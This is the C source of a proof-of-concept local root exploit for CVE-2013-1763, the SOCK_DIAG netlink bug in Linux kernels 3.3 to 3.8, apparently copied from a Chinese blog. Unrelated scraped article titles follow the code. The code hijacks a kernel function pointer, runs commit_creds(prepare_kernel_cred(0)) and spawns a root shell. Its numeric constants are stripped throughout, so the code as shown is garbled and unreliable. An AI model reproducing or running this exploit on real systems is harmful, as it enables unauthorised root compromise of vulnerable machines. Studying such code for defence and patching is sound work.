/*

* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8

* bug found by Spender

* poc by SynQ

*

* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux

* using nl_table->hash.rehash_time, index 81

*

* Fedora 18 support added

*

* 2/2013

*/

#include <unistd.h>

#include <sys/socket.h>

#include <linux/netlink.h>

#include <netinet/tcp.h>

#include <errno.h>

#include <linux/if.h>

#include <linux/filter.h>

#include <string.h>

#include <stdio.h>

#include <stdlib.h>

#include <linux/sock_diag.h>

#include <linux/inet_diag.h>

#include <linux/unix_diag.h>

#include <sys/mman.h>

typedef int __attribute__((regparm())) (* _commit_creds)(unsigned long cred);

typedef unsigned long __attribute__((regparm())) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;

_prepare_kernel_cred prepare_kernel_cred;

unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm()))

kernel_code()

{

    commit_creds(prepare_kernel_cred());

    return -;

}

int jump_payload_not_used(void *skb, void *nlh)

{

    asm volatile (

        "mov $kernel_code, %eax\n"

        "call *%eax\n"

    );

}

unsigned long

get_symbol(char *name)

{

    FILE *f;

    unsigned long addr;

    char dummy, sym[];

    int ret = ;

    f = fopen("/proc/kallsyms", "r");

    if (!f) {

        return ;

    }

    while (ret != EOF) {

        ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);

        if (ret == ) {

            fscanf(f, "%s\n", sym);

            continue;

        }

        if (!strcmp(name, sym)) {

            printf("[+] resolved symbol %s to %p\n", name, (void *) addr);

            fclose(f);

            return addr;

        }

    }

    fclose(f);

    return ;

}

int main(int argc, char*argv[])

{

    int fd;

    unsigned family;

    struct {

        struct nlmsghdr nlh;

        struct unix_diag_req r;

    } req;

    char    buf[];

    if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < ){

        printf("Can't create sock diag socket\n");

        return -;

    }

    memset(&req, , sizeof(req));

    req.nlh.nlmsg_len = sizeof(req);

    req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;

    req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;

    req.nlh.nlmsg_seq = ;

    //req.r.sdiag_family = 89;

    req.r.udiag_states = -;

    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

    if(argc==){

        printf("Run: %s Fedora|Ubuntu\n",argv[]);

        return ;

    }

    else if(strcmp(argv[],"Fedora")==){

      commit_creds = (_commit_creds) get_symbol("commit_creds");

      prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");

      sock_diag_handlers = get_symbol("sock_diag_handlers");

      nl_table = get_symbol("nl_table");

      if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){

        printf("some symbols are not available!\n");

        exit();

        }

      family = (nl_table - sock_diag_handlers) / ;

      printf("family=%d\n",family);

      req.r.sdiag_family = family;

      if(family>){

        printf("nl_table is too far!\n");

        exit();

        }

    }

    else if(strcmp(argv[],"Ubuntu")==){

      commit_creds = (_commit_creds) 0xc106bc60;

      prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;

      req.r.sdiag_family = ;

    }

    unsigned long mmap_start, mmap_size;

    mmap_start = 0x10000;

    mmap_size = 0x120000;

    printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);

        if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,

                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -, ) == MAP_FAILED) {

                printf("mmap fault\n");

                exit();

        }

    memset((void*)mmap_start, 0x90, mmap_size);

    char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm

    unsigned long *asd = &jump[];                                    //把\x11\x11\x11\x11改成kernel_code    
                                                                      //    commit_creds(prepare_kernel_cred(0));

    *asd = (unsigned long)kernel_code;

    memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump)); //在end of mmap space塞入char jump[]

    if ( send(fd, &req, sizeof(req), ) < ) {

        printf("bad send\n");

        close(fd);

        return -;

    }

    printf("uid=%d, euid=%d\n",getuid(), geteuid() );

    if(!getuid())

        system("/bin/sh");

}

quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8的更多相关文章

  1. 8.3.2018 1 Quick and dirty 快而脏的快餐

    Quick and dirty  快而脏的快餐 BEIJING  北京 Food delivery is a booming business. Waste is piling up, too  送餐 ...

  2. Extjs4.x TreeGrid Dirty 更新数据,dirty标记不会自动清除的bug

    如上图所示,当修改某个属性值,成功提交后,dirty的小三角不会自动清除,这个是官方treegrid的一个bug,目前尚未解决. bug:http://www.sencha.com/forum/sho ...

  3. 一则利用内核漏洞获取root权限的案例【转】

    转自:https://blog.csdn.net/u014089131/article/details/73933649 目录(?)[-] 漏洞描述 漏洞的影响范围 漏洞曝光时间 漏洞产生的原因 漏洞 ...

  4. OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解

    OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read ...

  5. SharePoint 2013 对话框

    The quick way to open a sharepoint 2013 dialog modal form is via Javascript below 1 2 3 4 5 function ...

  6. 快速重启 Quick Boot plus

    Quick Boot(快速启动)可方便快速地重启/关闭您的设备,或将您的设备重启到恢复/引导模式,增强版还实现了热启动和Tasker/Locale插件集成功能.快速重启汉化版 Quick Boot p ...

  7. Golang优秀开源项目汇总, 10大流行Go语言开源项目, golang 开源项目全集(golang/go/wiki/Projects), GitHub上优秀的Go开源项目

    Golang优秀开源项目汇总(持续更新...)我把这个汇总放在github上了, 后面更新也会在github上更新. https://github.com/hackstoic/golang-open- ...

  8. WEB APPLICATION PENETRATION TESTING NOTES

    此文转载 XXE VALID USE CASE This is a nonmalicious example of how external entities are used: <?xml v ...

  9. MSI Error 1603 installing AppFabric 1.1 / Win7 x64

    MSI Error 1603 installing AppFabric 1.1 / Win7 x64  Archived Forums A-B > AppFabric Caching   先说解 ...

随机推荐

  1. 【题解】Antisymmetry

    题目大意 对于一个01字符串,如果将这个字符串0和1取反后,再将整个串反过来和原串一样,就称作“反对称”字符串.比如00001111和010101就是反对称的,1001就不是. 现在给出一个长度为N的 ...

  2. linux 登录失败,修改root密码

      开机按下 esc  重启系统后出现GRUB界面在引导装载程序菜单上,用上下方向键选择你忘记密码的那个系统键入“e” 来进入编辑模式.   接下来你可以看到如下图所示的画面,然后你再用上下键选择最新 ...

  3. Python的基本类型(list,tuple)

    Python的基本类型(list,tuple) 一列表: 1.列表是Python基础的数据类型之一,其他语言也有类似的数据类型,比如js中的数组,java中的数组等,它是以[]括起来 ,每个元素用', ...

  4. 【学习总结】Python-3-风格各异的数值类型实例

    菜鸟教程-Python3-基本数据类型 可能是考点的各种形态的数值类型 int型:正数负数,八进制0开头,十六进制0x开头 float型:小数点的前后都可以没有数字,自动补全 complex型:虚部的 ...

  5. 解决div和img之间的空隙

    div盒子和img之间有空隙之前也遇到过几次这问题,今天又遇到了特地来总结下. 先上代码和效果图: <!doctype html><html lang="en"& ...

  6. alpha阶段绩效考核

    (按姓氏拼音顺序) (评分还考虑了从开题至今的博客.汇报等工作,但由于太杂乱没法列出) 陈修远 B+ 后端技术踩坑及代码编写 傅泳淦 A- Android端技术踩坑及代码编写 李浩冉 B   后端知识 ...

  7. mysql百万级别重排主键id(网上的删除重建id在大数据量下会出错)

    网上教程: 先删除旧的主键 再新建主键 :数据量少时没问题,不会出现主键自增空缺间隔的情况(如:1,2,3,5):但是大数据量时会出现如上所述问题(可能是内部mysql多进程或多线程同时操作引起问题) ...

  8. RAD介绍及实战,LVM介绍及实战,磁盘常见故障

    目录 一.RAID 1.RAID好处: 2.RAID的运行方式: 3.RAID的级别: 二.RAID实战 软RAID 1.RAID0 2.RAID1 3.RAID5 4.RAID10 三.LVM介绍 ...

  9. Concurrent - 线程池

    原创转载请注明出处:https://www.cnblogs.com/agilestyle/p/11426981.html ThreadPoolExecutor底层方法参数: @param corePo ...

  10. mysql inner join用法

    inner join(等值连接):只返回两个表中联结字段相等的行. left join(左联接):返回包括左表中的所有记录和右表中联结字段相等的记录. right join(右联接):返回包括右表中的 ...